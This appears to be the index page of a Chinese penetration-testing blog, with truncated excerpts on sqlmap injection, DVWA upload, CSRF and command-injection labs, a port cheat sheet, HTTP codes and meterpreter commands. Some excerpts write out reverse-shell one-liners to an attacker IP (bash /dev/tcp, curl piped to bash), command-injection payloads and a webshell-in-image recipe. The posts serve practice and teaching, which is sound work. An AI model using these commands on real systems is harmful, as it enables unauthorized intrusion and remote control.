Putdownd’s Blog

概述 面试遇到一个靶场,复盘一下 测试环境: vulfocus在线靶场 http://vulfocus.io/ 面试时的测试经过: bp+xray kali 扫目录 经面试官提示 sql 注入, 因为此前有类似的界面就直接再下图进行了post注入(注入点不在这) 后在登录界面发现post注入 放到sqlmap进行注入,时间结束,没看到结果 重新测试 面试结束,在xray的报告中发现该靶场的一些信息,重新进行测试 靶场信息,面试的时候只知道ip awvs 扫描结果,和靶场描述一致 SQL注入 知道主要是sql注入,其他功能就先放弃测试 开测 接着没测完的接着跑 保存http 开跑 1sqlmap -r hms.txt --level 4 --dbs hms 1sqlmap -r hms.txt --level 4 -D hms --tables 看admin 1sqlmap -r hms.txt --level 4 -D hms -T admin --columns 看字段 1qlmap -r hms.txt...

Vulnerability: File Inclusionlow 查看代码，对上传文件没有做任何的过滤措施 Medium 查看代码：增加了MIME校验,只允许上传MIME类型（Content-Type请求头）为image/jpeg或image/png的文件。 将1.php文件后缀名改为.png（或.image）,上传1.php文件并用burp抓包，将包发到repeater repeater中修改filename参数值从1.png修改为1.php，点send，从response中可以看到文件上传成功，并返回了保存路径。 High 查看代码，是通过字符串匹配来确定文件后缀名，并且查看文件的相关参数，提高了过滤的强度。 制作图马文件，把一句话木马放在一张图片中(可以绕过 getimagesize 函数的检测) 1copy 1.png/b+1.php/a 2.png Impossible

Vulnerability: File Inclusion相关函数include()函数：会将指定的文件读入并且执行里面的程序；require()函数：会将文件的内容读入，并且把自己本身替换成这些读入的内容；include_once()函数：和 include 语句完全相同，唯一区别是如果该文件中已经被包含过，则不会再次包含。如同此语句名字暗示的那样，只会包含一次require_once()函数：和 require 语句完全相同，唯一区别是如果该文件中已经被包含过，则不会再次包含。如同此语句名字暗示的那样，只会包含一次 文件包含功能文件包含功能使用include函数将web根目录以外的目录文件包含进来，文件包含功能给开发人员带来了便利。通过把常用的功能归类成文件，文件包含可以提高代码重用率。文件包含漏洞是高危漏洞，往往会导致任意文件读取和任意命令执行，造成严重的安全后果。文件包含往往要使用到目录遍历工具 相关知识1.文件包含分类： 目录遍历（Directory traversal）和文件包含（File include）的一些区别：目录遍历是：可以读取web根目录以外的其他目录，根...

Vulnerability: Cross Site Request Forgery (CSRF) csrf全称为：Cross-site request forgery，是一种常见的web攻击。在场景中，攻击者会伪造一个请求（通常是一个链接），然后欺骗目标用户点击，用户一旦点击，攻击也就完成了。 low 这里的密码检测是直接将输入的进行拼接，检验password_new与password_conf是否一致。于是可以先伪造一个简陋的链接 1http://192.168.169.233/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 这样我们就成功地将密码更改为password了 上面的链接注意改成自己的ip 和 路径 Medium 写一个html 123![](192.168.169.233/dvwa/vulnerabilities/csrf/?password_new=test&password_conf=test&a...

Vulnerability: Command Injection 根据程序调用系统命令。 low1234一、输入：127.0.0.1 && ipconfigipconfig命令是DOS系统中的命令，可以帮助用户查看网络状况，可以看到你想看到的众多网络信息，比如延迟，IP，主机信息，物理地址信息等等。二、输入：127.0.0.1 && whoami Medium 同样的命令报错 可能是这里&&被过滤了，那我们就试一下其它的连接方法。 12 || whoami 输入：12&whoami 成功获得账户 源码 High 源码 更多过滤 不过还是有漏洞比如：输入：12222222 |whoami中间不加空格成功获得账户 Impossible

转载：https://mp.weixin.qq.com/s/o2AVkr9jP11KyDpamPUa7A 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184...

重要端口及服务 port service description 21 FTP FTP控制端口，检查匿名登录、弱口令 22 SSH SSH远程登录协议，检查弱口令 23 Telnet Telnet终端仿真协议 25 SMTP 简单邮件传输协议 53 DNS服务 80 Web 检查常见Web漏洞及管理后台 110 POP3 邮局协议 111 NFS 网络文件系统 389 LDAP 轻型目录访问协议，检查是否存在匿名访问 443 OpenSSL 检查心脏滴血及Web漏洞 445 SMB 检查是否存在MS17-010、MS08-067漏洞 512 Rexec 检查远程shell命令及暴力破解 873 Rsync 检查匿名登录、弱口令 1433 SQL Server SQL Server数据库服务 1521 Oracle Oracle数据库服务 2049 NFS NFS未授权访问 2181 Zookeeper 分布式协调系统 2375 Docker Remote API未授权访问 3306 MySQL M...

100 Continue 这个临时响应表明，迄今为止的所有内容都是可行的，客户端应该继续请求，如果已经完成，则忽略它。 101 Switching Protocol 该代码是响应客户端的 Upgrade (en-US) 标头发送的，并且指示服务器也正在切换的协议。 102 Processing (WebDAV) 此代码表示服务器已收到并正在处理该请求，但没有响应可用。 103 Early Hints 此状态代码主要用于与Link 链接头一起使用，以允许用户代理在服务器仍在准备响应时开始预加载资源。 200 OK 请求成功。成功的含义取决于HTTP方法。GET：资源已被提取并在消息正文中传输。HEAD：实体标头位于消息正文中。POST：描述动作结果的资源在消息体中传输。TRACE：消息正文包含服务器收到的请求消息。 201 Created 该请求已成功，并因此创建了一个新的资源。这通常是在POST请求，或是某些PUT请求之后返回的响应。 202 Accepted 请求已经接收到，但还未响应，没有结果。意味着不会有一个异步的响应去表明当前请求的结果，预期另外的进程和服务去处理请求，或...

反弹shell常用反弹shell方式如下（bash/curl/http），其他反弹shell方式参考：Click Here bash1bash -i >& /dev/tcp/192.168.35.152/7777 0>&1 curl攻击方： 12cat bash.html/bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1 被控端： 1curl 192.168.35.152/bash.html|bash http攻击方： 编写shell脚本并启动http服务器 123echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.shpython2环境下：python -m SimpleHTTPServer 80python3环境下：python -m http.server 80 被控端： 1234# 上传shell.sh文件wget 192...

仅作渗透测试技术实验之用，请勿针对任何未授权网络和设备。 https://www.cnblogs.com/ssooking/p/6192995.html run vnc 无法操作的远程桌面 常用的32个命令归纳小结1、background命令返回，把meterpreter后台挂起 2、session命令session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令获取目标主机的远程命令行shell 如果出错，考虑是目标主机限制了cmd.exe的访问权，可以使用migrate注入到管理员用户进程中再尝试 4、cat命令查看目标主机上的文档内容 例如：cat  C:\\boot.ini 查看目标主机启动引导信息 5、getwd命令获取系统工作的当前目录 6、upload命令上传文件到目标主机，例如把后门程序setup.exe传到目标主机system32目录下 upload  setup.exe  C:\\windows\\system32\ 7、download命令把目标主机上的文件下载到我们的攻...